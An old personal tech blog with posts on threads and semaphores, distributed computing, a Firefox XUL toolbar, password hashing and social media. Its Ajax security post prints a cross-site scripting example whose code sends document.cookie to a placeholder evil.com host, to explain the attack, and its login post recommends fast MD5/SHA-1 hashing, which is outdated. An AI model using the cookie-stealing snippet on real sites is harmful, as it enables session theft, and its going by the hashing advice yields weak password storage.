Thursday, March 12, 2009

MapReduce Framework (Article 2) : Distributed computing

Distributed computing - CPUs having seperate memory. All such CPUs are connected by some means (ethernet, gigabit ethernet, wan etc). 

Basic element of distributed computing is to identify the subproblems that can run simultaneously without any data dependency e.g. in an animation movie, all frames can be rendered simultaneously as to render frame #10 we don't need data from frame #11.

In distributed computing environment, there are multiple processes running on hundreds of CPUs. They work on a copy of original input. Nobody will modify the original input. As the computation proceeds, there will be data transfer happening between nodes. We mainly use TCP/IP protocol to transfer data between nodes.

Challenges in distributed computing environment
  1. Reliable messaging is a MUST.
  2. In distributed computing environment, data will move from one node to another, the intermediate nodes can read your data along with IP headers. So, either you need to trust all the intermediate nodes or build your own protocol, so that data is encrypted but not IP headers.
  3. We need to make sure all data packets originated from host machine.
  4. We need to make sure data sits close to logical computing unit. So Router position is very important.
Hadoop (hadoop.apache.org/core/) is an open source java implementation of distributed computing platform for MapReduce framework that supports the above mentioned features. I will discuss Hadoop distributed File System in article #4.

MapReduce Framework (Article 1) : Parallel computing

Parallel Computing - Muliple CPUs in one box. All CPUs share the same memory. 

Now the question is how to achieve parallelism in a single CPU box ? By using threads. If we call a function foo from main thread, the process stack will look like this


So, main function has to wait till foo ends. If you spawn a thread, the thread will have 
its own process stack and that won't block execution of main function. So by using thread, we can spawn multiple processes and all will execute simultaneously. In a multi CPU system, multiple threads can run simultaneously.





Parallelisation pitfalls
  1. How do we assign work units to worker threads ?
  2. What if we have more work units than worker threads.
  3. How do we aggregare result at the end?
  4. How do we know all worker threads have finished?
  5. What if the work can not be divided into seperate tasks?
Each of these problems represent one point at which multiple threads communicate with one another or access a shared resource. Any memory that can be used by multiple threads must be associated with a synchronization system.

The most important concept in Synchronization is

Race condition
Each thread is racing to complete and depending on who is the winner, outcome will be different. We need to make sure that this condition never arise.

Thread1

void foo() {
    x++;
    y = x;
}

Thread 2

void bar() {
    y++;
    x = y;
}

Here x and y are two shared variables. We don't know how the threads are going to be executed by OS. Based on the execution order, the output will be different. To fix the issue we need to make sure only one thread can work at a particular time. This can be achieved by using semaphore.

Semaphore

To make one Object Thread-Safe, bind one semaphore to that object. Semaphore has two synchronization premitives (special variable or method that gurentees that it can only be accessed by one thread at a particular time).
  1. lock() - Each semaphore will have a queue associated with it. Call to lock() when the semaphore is already blocked causes the thread to wait and the thread will be added to the queue.
  2. unlock() - will wake up all the threads waiting on the semaphore.
By using semaphore, we can modify the above programs so that Race condition will never arise.

Thread1

void foo() {
    sem.lock();
    x++;
    y = x;
    sem.unlock();
}

Thread 2

void bar() {
    sem.lock();
    y++;
    x = y;
    sem.unlock();
}

Semaphore will guarentee that only one thread will execute the block at a particular time, however they are not sufficient to guarentee that nly one flow is allowed (foo should execute before bar).

This can be achieved by using conditional variable. A conditional varaible notifies threads that a particular condition has met. They have two methods
  1. wait() - waiting on a conditional varaible make the thread to sleep.
  2. notify() - notifying on a conditional variable will wake someone up who is waiting.
Now to achieve the flow, we will introduce one boolean fooFinished (boolean is thread safe) and one conditional variable fooFinishedCV.

Thread1

void foo() {
    sem.lock();
    x++;
    y = x;
    fooFinished = true;
    sem.unlock();
    fooFinishedCV.notify();
}

Thread 2

void bar() {
    sem.lock();
    if ( !fooFinished) {
        fooFinishedCV.wait(sem);
    }
    y++;
    x = y;
    sem.unlock();
}

On waiting on a conditinal variable we need to release the lock, otherwise it may happen that foo never starts. This is called Deadlock situation.

So there are so many things to look into while working on threads to achieve parallelism. Plus due to physical limitation we won't be able to attach hundreds of CPUs to a single box. So if you want to process terabytes of data in X hours, parallel computing won't help you.

I will discuss Distributed computing platform in my next article which is the main concept behind google MapReduce framework to process huge dataset.

Saturday, July 7, 2007

Ajax Applications :: Security threats

Ajax (Asynchronous javascript and XML) is the key technology in web 2.0. In web 2.0 world, Ajax changes the presentation of web pages by dynamically loading data from server. But these applications also become vulnerable to attack. Hackers can easily insert malicious code into server response. But how ?

Lets say you are dynamically loading user Photo in a social networking environment. You are expecting JSON response like this
{ user_avatar: './img/avatar1.jpg' }
and once you have the data, you are directly changing the src of the user photo section using DOM
document.getElementById("user_photo").src = response.user_avatar;

So simple .... but there is security hole which can allow the hacker enter into your homepage without login.

Step 1 : Hacker modifies the JSON response. Now the response looks like
{ user_avatar: "http://evil.com/steal?cookie="+ document.cookie}

Step 2 : You replace the user_photo with this one.
document.getElementById("user_photo").src = response.user_avatar;

Step 3 : Browser will first evaluate document.cookie and then try to load the URL. It will call evil.com site with your browser cookie. If you store user password in browser cookie, that will be accessible to hacker. Also he will get the session ID from cookie and using that he will enter into user home page without login.

Example

<html>
<head>
<script language="javascript">
function test() {
document.getElementById("avatar").src="http://evil.com/steal?cookie="+ document.cookie;
}
</script>
</head>

<body >

<input type="button" value="Test" onclick="test()">
<img src="" id="avatar" alt="User avatar">
</body>
</html>



This is called XSS (Cross site scripting) Attack. To prevent this attack, always validate your input and response output. Remove all the <script> tags if available before performing any operation like evaluating the script using eval() function. Also document.cookie is a very dangerous string to have in your Ajax Response. So, it is recommended to create a list of potentially dangerous strings and before evaluating the response, pass the response through a filter to remove all such strings.

Once you secure the JSON response string, convert it into JSON object and perform your operation.

Monday, July 2, 2007

Creating Mozilla toolbar

Last month I implemented one custom mozilla toolbar for our application using XUL (XML User Interface Language). Its an amazing framework. Lets create a sample toolbar to detect and collect images from any website.

Setup - Workspace directory structure

toolbar (TOP Level Directory)
--chrome

----content
----skin
--install.rdf (empty file)
--chrome.manifest (empty file)

Mozilla browser has following sections
  1. toolbar
  2. menubar
  3. window content
  4. status bar

(toolbar+menubar+status bar) = part of chrome

mozilla browser uses XUL for the UI. The default xul is browser.xul. You can add extra functionality by providing custom xul file. So, almost every mozilla extension has one xul file. This file is used to add toolbar button, right click context menu etc.


Step 1
Add one xul file to override browser default UI. This will add one "Right click context menu" => Toolbar::Collect it










Step 2
When you click on the context menu => javascript collect function is called. We have added one overlay.js file. This file is also in Content directory.

window.addEventListener("load", initToolbar, true);
var aConsoleService = Components.classes["@mozilla.org/consoleservice;1"].
getService(Components.interfaces.nsIConsoleService);




function initToolbar() {
var menu = document.getElementById("contentAreaContextMenu");
menu.addEventListener("popupshowing", contextPopupShowing, false);
}

function contextPopupShowing() {
var menuitem = document.getElementById("zoomarena-menu");
if(menuitem)
menuitem.hidden = !gContextMenu.onImage;
}

function collect() {
aConsoleService.logStringMessage("Collect sample");
if ( gContextMenu.onImage) {
var img = gContextMenu.target;
if ( img ) {
var newTab = gBrowser.addTab(img.src);
gBrowser.selectedTab = newTab;
}
}
}

Here we have added one listener function "initToolbar" when the toolbar gets loaded. In initToolbar we have added one more listener function (when context menu is about to become visible => this function will be called). Using this function, we check if the context menu is on one image => show that "Toolbar::collect it" otherwise don't show it.

We also define the collect() function used in overlay.xul. This will get the img src and open it in new browser tab.

Step 3
You are almost done. Define a chrome.menifest file (in toolbar folder) to register the new overlay. You can use this file to register custom skin (icons used in the toolbar and css file). Here chrome/skin folder is empty.We will just register the new overlay.

content toolbar jar:chrome/toolbar.jar!/content/
overlay chrome://browser/content/browser.xul chrome://toolbar/content/overlay.xul

Step 4
Define install.rdf file. This file is self explanatory.





















Step 5
Packaging. Here is the script to package the toobar and distribute as a xpi file. Here is the file (xp.bat)

cd chrome
rm toolbar.jar
zip -r toolbar.jar content/
cd ..
rm toolbar.xpi
zip -r toolbar.xpi chrome.manifest install.rdf chrome/toolbar.jar


Final directory / file structure

toolbar
--xp.bat
--chrome.menifest
--install.rdf
--chrome
----content
------overlay.js
------overlay.xul
----skin

Execute xp.bat. This will create toolbar.xpi in toolbar directory. Now you are ready to distribute the package.

Sunday, July 1, 2007

Building a secure login system

Sometimes we store plain text user passwords in database. If someone gets access to your database, he can damage the whole system. So its recommended to encrypt the password using one way hash algorithm before storing.

Hash value is unique for a sequence of input data. The beauty of one way hash algorithm is that we can easily get the hash value of piece of data but from the hash value its almost impossible to get back the original data. There are no of hash functions available

  1. SHA-1 - Output = 160 bits
  2. SHA-256 - Output = 256 bits
  3. SHA-512 - Output = 512 bits

MD5 (Message Digest algorithm 5) is also widely used hashing algorithm. The output size = 128 bits. SHA is the successor of MD5.

Storing User detail

Lets say your application collects the following parameters while registering new user
  1. name
  2. password
  3. email
So in the backend controller code, you should calculate the password hash using any of the above mentioned algorithm before storing the password in database.

SHA1 hash - PHP function - sha1($_POST['password'])
MD5 hash - PHP function -md5($_POST['password'])

User Authentication

When the user logs in, he will provide username and plain text password. Use the same algorithm you have used for calculating password hash at the time of registration and calculate the hash value again. As the HASH value is unique for a set of input characters and hence if the hash value matches, perform the Authentication success logic.

NOTE:: It is not safe to send the plain text user password over HTTP. Attacker can easily access that HTTP packet and extract the password. Always use SSL while sending user credential.


Weaknesses

By adding password hash you have made the hacker's life much more difficult. But its not yet a full proof solution. If somehow the hacker gets access to the database, he will try to crack the hash. Using a high speed CPU, we can generate HASH of n number of strings in one sec. So the hacker will start generating random strings and its hash value. If his random string algorithm is able to generate the same hash output that means the generated random string is the user password.

Follow the steps to fix this security hole
  1. Generate a random string - RANDOM_STRING
  2. User has entered "xyz" as the password while registration.
  3. Append the generated string and then calculate HASH value. So instead of stroning HASH_ALGO($_POST['password']), store HASH_ALGO($_POST['password'].RANDOM_STRING)
  4. Store the RANDOM_STRING in database.
  5. Every time user logs in, use the previously used RANDOM_STRING to calculate hash. HASH_ALGO(USER_CREDENTIAL.RANDOM_STRING). Then compare this hash value with the stored hashed password. If it matches perform Authentication success logic + perform some extra steps to confuse the hacker
      • At the time of verifying user credentials, you have the plain text password.
      • Once verified -
      • Generate another random string and compute
        HASH_ALGO(USER_CREDENTIAL.NEW_RANDOM_STRING) = XYZ
      • Update database fields
        password_hash and random_string
      • Thus we have updated the random number and the password hash value but not the actual password. But next time new random number will be used to validate user credential.
      • This process will change the user password hash value every time user logs in. This will confuse the hacker. Also this process will make almost all password hash values unique which in turn reduce the database damage.
Things to remember
  • Store password hash value.
  • Use SSL to transmit plain text password.
  • Ask user to change the password after every x number of days.
  • Use the random string to make all the password hash values unique which will reduce database damage.
  • Use random string algorithm to change database password_hash value every time user logs in. This will confuse the hacker.

Impact of Social Media

Social networking is really changing the way people spend time on internet. People love to create a virtual social community around them and some of them prefer to do activities in their virtual world than real world. Its not a new concept, but the way we present data is different. Just take an example of Instant messenger, its all about a private social network, where you have access to your friends profile only. But we wanna go beyond that. Now a days social networking sites help people reach out to someone he has met or never met before.

Its just the starting point. Soon we are going to see lots of new innovations in that direction. Now Web 2.0 has added a new dimension to web application.

India's mobile market is booming. Total no of mobile phone subscribers will cross 200 million very soon. Will Mobile social networking become the next big thing ? The opportunity is huge. Lets wait and watch.